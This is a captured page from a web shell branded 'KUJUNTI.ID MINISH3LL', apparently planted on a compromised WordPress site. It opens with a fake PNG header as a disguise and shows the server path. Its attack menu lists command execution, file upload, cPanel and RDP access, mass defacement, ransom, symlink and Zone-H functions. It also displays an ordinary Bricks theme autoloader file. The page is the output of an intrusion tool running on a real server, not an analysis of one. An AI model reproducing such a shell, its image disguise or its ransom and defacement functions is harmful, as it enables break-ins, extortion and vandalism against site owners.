\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 csarite.com
KUJUNTI.ID MINISH3LL
Path : /var/www/html/csarite.com/public_html/wp-content/themes/bricks/includes/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/csarite.com/public_html/wp-content/themes/bricks/includes/autoloader.php


<?php
namespace Bricks;

if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly

/**
 * Autoloads plugin classes using PSR-4.
 */
class Autoloader {
	/**
	 * Handle autoloading of PHP classes
	 *
	 * @param String $class
	 * @return void
	 */
	public static function autoload( $class ) {
		if ( strpos( $class, __NAMESPACE__ ) !== 0 ) {
			return;
		}

		$class                  = substr( $class, strlen( __NAMESPACE__ ) );
		$class                  = strtolower( $class );
		$class                  = str_ireplace( '_', '-', $class );
		$file_parts             = explode( '\\', $class );
		$len                    = count( $file_parts );
		$file_parts[ $len - 1 ] = $file_parts[ $len - 1 ];
		$file                   = dirname( __FILE__ ) . implode( '/', $file_parts ) . '.php';

		if ( is_file( $file ) ) {
			require_once $file;
		}
	}

	public static function load_functions() {
		foreach ( glob( BRICKS_PATH . 'includes/utilities/*.php' ) as $filename ) {
			require_once $filename;
		}
	}

	/**
	 * Register SPL autoloader
	 *
	 * @param bool $prepend
	 */
	public static function register( $prepend = false ) {
		self::load_functions();

		spl_autoload_register( [ new self(), 'autoload' ], true, $prepend );
	}
}

© KUJUNTI.ID